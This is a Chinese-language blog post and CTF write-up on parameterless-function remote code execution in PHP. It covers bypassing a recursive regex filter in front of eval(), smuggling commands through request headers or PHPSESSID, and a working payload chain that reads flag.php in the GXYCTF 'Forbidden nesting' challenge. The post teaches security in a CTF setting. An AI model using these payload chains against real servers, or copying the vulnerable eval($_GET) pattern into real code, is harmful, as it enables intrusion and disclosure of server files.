PHP无参数RCE

最新推荐文章于 2023-10-16 10:29:50 发布
最新推荐文章于 2023-10-16 10:29:50 发布
阅读量2.7k 收藏 9
点赞数 3
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/104852576
版权

无参数函数RCE,即在不使用参数的条件下,仅使用函数进行RCE。
如:代码中有

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}

这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/
对于该正则只允许形如 a(b(c())); a();
也就是只能使用函数套娃,里面的函数所产生的信息就是作为参数

无参RCE相关变量和函数

获取当前环境变量

getenv():
PHP中的$_ENV是一个包含服务器端环境变量的数组。它是PHP中一个超级全局变量,我们可以在PHP 程序的任何地方直接访问它。
$_ENV只是被动的接受服务器端的环境变量并把它们转换为数组元素,你可以尝试直接输出它。
在这里插入图片描述

get_defined_vars — 返回由所有已定义变量所组成的数组

全局变量如[GLOBALS] [_POST] [_GET] [_COOKIE] [_FILES]也在其中
在这里插入图片描述
通过获取这些变量中的恶意参数进行REC
$_GET $_POST $_COOKIE

通常都有全局过滤,可以尝试从$_FILES下手。

从数组中取值:

array_rand — 从数组中随机取出一个或多个单元
在这里插入图片描述

array_reverse — 返回单元顺序相反的数组
在这里插入图片描述

array_flip — 交换数组中的键和值
在这里插入图片描述

current — 返回数组中的当前单元
在这里插入图片描述

获取信息头,PHPSESSID

从HTTP HEADER中获取信息(注入的恶意命令)并用于REC (apache2环境)
在这里插入图片描述

执行var_dump(end(getallheaders()));时就可将请求头最后一个字段的内容当命令注入

session_id — 获取/设置当前会话 ID
在这里插入图片描述
可获取PHPSESSID ,PHPSESSID允许字母和数字出现,可将payload转换为16进制字符串,当从cookies:PHPSESSID取出来后再通过hex2bin转回去,进行REC

读取文件,目录遍历

file_get_contents — 将整个文件读入一个字符串

readfile — 输出文件
读取文件并写入到输出缓冲。

highlight_file()或show_source() — 语法高亮一个文件

getcwd — 取得当前工作目录

scandir — 列出指定路径中的文件和目录
在这里插入图片描述

dirname — 返回路径中的目录部分
在这里插入图片描述

<?php
echo dirname("c:/testweb/home.php") . "<br />";
echo dirname("/testweb/home.php");
?>

上面的代码将输出:

c:/testweb
/testweb

chdir — 改变目录
chdir(directory); directory 必需。规定新的当前目录。

例题:GXY_CTF “禁止套娃”

题目有 .git 源码泄露
在这里插入图片描述在这里插入图片描述

源码如下index.php

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

很典型的无参数RCE,但过滤了一些关键字,使得某些函数无法使用

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
在这里插入图片描述

pos(localeconv())返回一个 . pos是current()的别名 ,localeconv() 函数返回一个包含本地数字及货币格式信息的数组。数组的第一个值为 .
在这里插入图片描述
将pos(localeconv())套入就得到scandir(’.’) ,能够读取指定目录下的文件和目录
?exp=print_r(scandir(pos(localeconv())));
在这里插入图片描述
再套入next(array_reverse()); 将数组顺序反向后输出第二个值从而得到flag.php ,也可以用array_rand(array_flip()) 或者 session_id(session_start())
?exp=print_r(next(array_reverse(scandir(pos(localeconv())))));
在这里插入图片描述
最后套入show_source( ),将内容显示出来

参考:

https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/
https://www.gem-love.com/ctf/530.html#1array_reverse

Arnoldqqq
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
参数函数RCE+[GXYCTF2019]禁止套娃 1
bazzza的博客
12-27 873
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
rConfig v3.9.2 RCE漏洞分析1
08-03
攻击者可以发送精心构造的 GET 请求触发该漏洞,请求中包含两个参数,其中 searchTerm 参数可以包含任意值,但该参数必须存在,才能执行到第 63 行的
[长安战疫-cazy] Web题解
weixin_51804748的博客
01-20 2780
RCE_No_Para <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match('/session|end|next|header|dir/i',$_GET['code'])){ eval($_GET['code']); }else{ die("Hacker!"); } }else{ show_source(__FIL
ctfweb-无参RCE
qq_51862722的博客
08-17 969
最近做题遇到了几道无参数RCE的题,基本上还是不会,在此总结一下payload 常见提示: preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['xxx']) 有这种屏蔽的,一般都是无参数rce: (?R)引用当前表达式,后面加了?递归调用。允许执行类似a(b(c()))格式的无参数函数; 常见方法: 1.查看当前目录下的文件 print_r(scandir(pos(localeconv()))); #pos()函数可以替换为current()函数,一个意思
Code-Breaking Puzzles easy - phplimit(代码执行限制绕过)
烟敛寒林的博客
05-09 948
题目地址:http://120.78.164.84:49006 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); } 这里的正则匹配涉及到了PHP正则表达式的递归...
代码审计从入门到放弃(三) & phplimit
合天网安学院
03-14 1353
前言接着前面的代码审计从入门到放弃(一) & function、代码审计从入门到放弃(二) & pcrewaf本次是phplimit这道题,本篇文章提供了3种解法,即如何...
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成...
awd-watchbird:适用于AWD的功能强大PHP WAF
03-19
易于配置(单文件,无需加载外部js / css)可以随时开启/关闭某项防御基本防御:数据库注入(SQL注入)文件上传(上传)文件包含(lfi)标志关键字PHP反序列化(反序列化)命令执行(rce)分布式拒绝服务攻击(ddos...
Firmware_web_rce_finder:FWRF是用于固件Web端分析的开源工具
05-13
固件Web Rce Finder FWRF(不要尝试将其发音)是用于固件... 检查rce:尝试通过那些参数执行基本代码 测试服务器:启动测试服务器以进行手动搜索 Rce检查 服务器在攻击者端启动(侦听端口10020)并等待tcp数据包。 发
POC bomber -资源
11-19
tomcat,apache,jboss,nginx,struct2,thinkphp2x3x5x,spring,redis,jenkins,php语言漏洞,shiro,泛微OA,致远OA,通达OA等易受攻击组件的漏洞检测,支持调用dnslog平台检测无回显的rce(包括log4j2的检测),...
2021西电MoeCTF
little_L_A的博客
09-27 2082
MOECTF新生赛wpwebweb_Lnc web web_Lnc 题目 <?php error_reporting(0); include_once "flag.php"; $a=$_GET['a']; $b=$_POST['b']; if(isset($a)){ if($a!=$b&&md5($a)===md5($b)){ echo $flag; }else{ echo 'try again'; } }else{ hi
[原题复现]2019上海大学生WEB-Decade(无参数RCE、Fuzz)
笑花大王
05-16 418
简介 原题复现: 考察知识点:无参数命令执行、Fuzz 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 环境复现 代码 <?php highlight_file(__FILE__); $code = $_GET['code']; if (!empty($code)) { ...
PHP无参函数
Flynn的博客
04-18 638
eg <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); }
[NewStarCTF 2023] web题解
最新发布
rev1ve的博客
10-16 9521
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
参数读文件和RCE
..
01-08 568
题目背景:长安战疫杯的RCE_No_Para 代码解析: preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) preg_replace是执行正则搜索,如果搜索到则替换为空。 \W是匹配非数字、字母、下划线,[^\W]则是非\W的东西,即数字、字母、下划线,相当于小写的\w。 正则表达式 – 元字符 | 菜鸟教程 然后难点是(?R)?,意思为递归整个匹配模式。 举个例子: a() #递归零次 a...
浅析PHP正则表达式的利用技巧
xiaoi123的博客
12-20 518
浅析PHP正则表达式的利用技巧 正则表达式是什么 正则表达式(regular expression)描述了一种字符串匹配的模式(pattern),可以用来检查一个串是否含有某种子串、 将匹配的子串替换或者从某个串中取出符合某个条件的子串等。包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为"元字符")。 另外正则引擎主要可以分为基本不同的两大类:一种是DFA(确定性有穷自动机),...
php中的preg_replace函数,PHP正则替换preg_replace函数如何使用
weixin_36403128的博客
04-04 1167
PHP正则替换preg_replace函数的使用方法:1、去掉0字符,代码为【preg_replace("/0/","",$str)】;2、去掉所有数字,代码为【preg_replace("/[0-9]/","",$str)】。PHP正则替换preg_replace函数的使用方法:...
使用无参数函数进行命令执行
kali_Ma的博客
01-17 2436
前言 在这里总结一下无参数命令执行。 环境准备 测试代码 <?php highlight_file(__FILE__); if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } ?> 关键代码 preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) 这里使用pregreplace替换匹配到的字符为空,\
参数RCE
sGanYu
10-02 2136
[GXYCTF2019]禁止套娃 <?php include "flag.php";//执行并包含flag.php echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串 if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/.
php RCE常用函数
08-26
PHP中常用的RCE(远程代码执行)函数包括preg_match、array_values、current和eval。其中,preg_match函数主要用于过滤函数,将一些常用不带参数的函数的关键部分过滤掉,需要使用其他方法来执行命令。 array_values函数可以将数组的值重新组成一个数组,配合current函数可以取出数组的第一个值,用于RCE。另外,chdir()函数返回的是布尔类型的true,对不需要传入参数的time()函数没有影响,可以正常执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [浅谈无参数RCE](https://blog.csdn.net/weixin_30568317/article/details/116284685)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值